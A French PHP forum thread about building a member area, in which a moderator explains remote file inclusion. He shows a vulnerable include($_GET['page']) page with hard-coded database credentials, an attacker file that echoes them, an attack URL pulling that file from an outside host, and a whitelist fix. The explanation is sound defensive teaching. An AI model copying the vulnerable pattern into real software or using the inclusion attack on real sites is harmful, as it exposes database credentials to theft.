[PHP] Création d'un espace membre
2 participants
Page 1 sur 1
[PHP] Création d'un espace membre
Bonjour !
Je suis en train de créer un espace membres sur mon site mais je rencontre quelques problèmes. Duche ou d'autres membres, j'espère que vous pourrez m'aider !
1) Comment renommer une base avec phpmyadmin ? (je parle bien d'une base de données, pas d'une table)
2) Quand on se connecte à la base par l'intermédiaire de
3) Dans ma table des membres, j'ai voulu créer 5 champs (id, login, mdp_md5, nb_conn et points) mais quand un membre s'inscrit sur l'espace, j'ai une erreur parce que je n'initialise que les 3 premiers champs. J'ai pourtant mis une valeur par défaut aux 2 derniers membres. Mais suis-je obligé de l'initialiser lors de l'inscription d'un membre ?
4) Je galère un peu avec les sessions et les headers mais pour cette question, j'attends d'avoir la réponse à la question 2. :p
Je suis en train de créer un espace membres sur mon site mais je rencontre quelques problèmes. Duche ou d'autres membres, j'espère que vous pourrez m'aider !
1) Comment renommer une base avec phpmyadmin ? (je parle bien d'une base de données, pas d'une table)
2) Quand on se connecte à la base par l'intermédiaire de
- Code:
$base = mysql_connect ('server', 'login', 'password');
3) Dans ma table des membres, j'ai voulu créer 5 champs (id, login, mdp_md5, nb_conn et points) mais quand un membre s'inscrit sur l'espace, j'ai une erreur parce que je n'initialise que les 3 premiers champs. J'ai pourtant mis une valeur par défaut aux 2 derniers membres. Mais suis-je obligé de l'initialiser lors de l'inscription d'un membre ?
4) Je galère un peu avec les sessions et les headers mais pour cette question, j'attends d'avoir la réponse à la question 2. :p
Julien- Administrateur
- Nombre de messages : 12291
Age : 36
Localisation : Clermont-Ferrand
Profession / Etudes : Ingénieur
Points : 22468
Date d'inscription : 10/03/2005
Re: [PHP] Création d'un espace membre
Renommer une base de données, je n'ai jamais essayé, je ne sais pas si c'est possible en fait. Est-ce vraiment nécessaire ?
Par contre ce qui devrait être possible (mais à ne faire que si le renommage est impossible) c'est créer une nouvelles, exporter le contenu en script SQL DLL, importer ce contenu dans la nouvelle base et supprimer l'ancienne.
Pour ce qui est de la connexion, je n'ai encore jamais eu affaire à ce problème. Je ne travaille qu'en localhost pour le moment, avec les mots de passes par défaut.
Pour ne pas se faire hacker il y a des précautions à prendre oui. Je vais faire un petit post la dessus à la suite de celui-ci sur le sujet, avec un exemple d'erreur à ne pas faire.
Je suis partisant de les initialiser avec le si ce sont des champs obligatoires de la base de données. Ca reste transparent pour l'utilisateur, mais la base de donnée reçoit quand meme tous les champs.
Pour la gestion des session, le meux est que tu regardes mon code que je t'ai evoyé
Par contre ce qui devrait être possible (mais à ne faire que si le renommage est impossible) c'est créer une nouvelles, exporter le contenu en script SQL DLL, importer ce contenu dans la nouvelle base et supprimer l'ancienne.
Pour ce qui est de la connexion, je n'ai encore jamais eu affaire à ce problème. Je ne travaille qu'en localhost pour le moment, avec les mots de passes par défaut.
Pour ne pas se faire hacker il y a des précautions à prendre oui. Je vais faire un petit post la dessus à la suite de celui-ci sur le sujet, avec un exemple d'erreur à ne pas faire.
Je suis partisant de les initialiser avec le si ce sont des champs obligatoires de la base de données. Ca reste transparent pour l'utilisateur, mais la base de donnée reçoit quand meme tous les champs.
Pour la gestion des session, le meux est que tu regardes mon code que je t'ai evoyé
Duche- Modérateur
- Nombre de messages : 2210
Age : 39
Localisation : Louvain-la-Neuve (Belgique)
Profession / Etudes : Développeur en optimisation
Points : 8234
Date d'inscription : 16/01/2006
Re: [PHP] Création d'un espace membre
Une bonne façon de se faire hacker sa base de données.
Le problème vient d'une structure de site assez élégante mais pour laquelle il faut faire très attention.
Imaginons que je fasse mon site avec une seule page de base, par exemple monsite.php, à laquelle on fournit des paramètres via les options GET. Il suffirait par exemple de faire:
Il suffirait alors d'entrer l'url de cette façon ci: http://www.monsite.php?page=ma_page.php
C'est une façon de coder très élégante, les fichiers sont bien séparés et bien ordonnés. Mais il réside une grande faille. Certes l'utilisateur (et le hacker) ne peut pas voir le code php (à moins bien sur de hacker le serveur lui-même, mais ça c'est un problème de sécuité qui doit être réglé par les administrateurs du serveur, pas le webmaster d'un site qui y est hébergé), mais il peut par exemple écrire un fichier php comme ceci:
Il lui suffira alors d'appeler http://www.monsite.php?page=http://www.hack.php
Et cela affichera votre mot de passe et votre password de la base de données. Une fois récupérés, il peut faire ce qu'il veut avec votre base de données.
Pour se protéger de cela, il faudra rendre la page principale un peu plus sécurisée, par exemple en faisant ceci:
Qui ne permet donc qu'une liste préétablie d'url possibles.
Le problème vient d'une structure de site assez élégante mais pour laquelle il faut faire très attention.
Imaginons que je fasse mon site avec une seule page de base, par exemple monsite.php, à laquelle on fournit des paramètres via les options GET. Il suffirait par exemple de faire:
- Code:
<!-- page monsite.php -->
<?php
$db_login = 'duche';
$db_password = '123456';
?>
<html>
<body>
<?php
include($_GET['page']);
?>
</body>
</html>
Il suffirait alors d'entrer l'url de cette façon ci: http://www.monsite.php?page=ma_page.php
C'est une façon de coder très élégante, les fichiers sont bien séparés et bien ordonnés. Mais il réside une grande faille. Certes l'utilisateur (et le hacker) ne peut pas voir le code php (à moins bien sur de hacker le serveur lui-même, mais ça c'est un problème de sécuité qui doit être réglé par les administrateurs du serveur, pas le webmaster d'un site qui y est hébergé), mais il peut par exemple écrire un fichier php comme ceci:
- Code:
<?php
echo 'login = '.$db_login.'<br/>password = '.$db_password';
?>
Il lui suffira alors d'appeler http://www.monsite.php?page=http://www.hack.php
Et cela affichera votre mot de passe et votre password de la base de données. Une fois récupérés, il peut faire ce qu'il veut avec votre base de données.
Pour se protéger de cela, il faudra rendre la page principale un peu plus sécurisée, par exemple en faisant ceci:
- Code:
<!-- page monsite.php -->
<?php
$db_login = 'duche';
$db_password = '123456';
?>
<html>
<body>
<?php
switch($_GET['page'])
{
case 'page1': include('page1.php'); break;
case 'page2': include('page2.php'); break;
case 'page3': include('page3.php'); break;
default: echo 'URL incorrect.';
}
?>
</body>
</html>
Qui ne permet donc qu'une liste préétablie d'url possibles.
Duche- Modérateur
- Nombre de messages : 2210
Age : 39
Localisation : Louvain-la-Neuve (Belgique)
Profession / Etudes : Développeur en optimisation
Points : 8234
Date d'inscription : 16/01/2006
Re: [PHP] Création d'un espace membre
Ok ok je vois. Merci bien pour tes précisions et pour l'histoire de la sécurité aussi !
Julien- Administrateur
- Nombre de messages : 12291
Age : 36
Localisation : Clermont-Ferrand
Profession / Etudes : Ingénieur
Points : 22468
Date d'inscription : 10/03/2005
Page 1 sur 1
Permission de ce forum:
Vous ne pouvez pas répondre aux sujets dans ce forum
|
|
Jeu 2 Juil 2015 - 15:16 par louaraychi
» Devoir maison sur équilibre et réaction chimique
Dim 1 Fév 2015 - 17:19 par sararose
» Ma présentation
Sam 25 Oct 2014 - 23:29 par Rith
» projet scientique sur la LUMIERE
Ven 26 Sep 2014 - 20:33 par benjamin-010
» La trajectoire de la Terre
Mar 5 Aoû 2014 - 22:19 par Alban
» Equilibrer une réaction redox
Dim 8 Juin 2014 - 21:18 par Courtney ♥
» les effets sur les lignes de transport de l’électricité
Ven 30 Mai 2014 - 17:14 par leila14
» lignes de transport de l'électricité
Ven 30 Mai 2014 - 17:07 par leila14
» Gravitation
Ven 16 Mai 2014 - 20:16 par fatimaa
» Maquette suspension de moto 2D
Jeu 17 Avr 2014 - 17:20 par Sti2d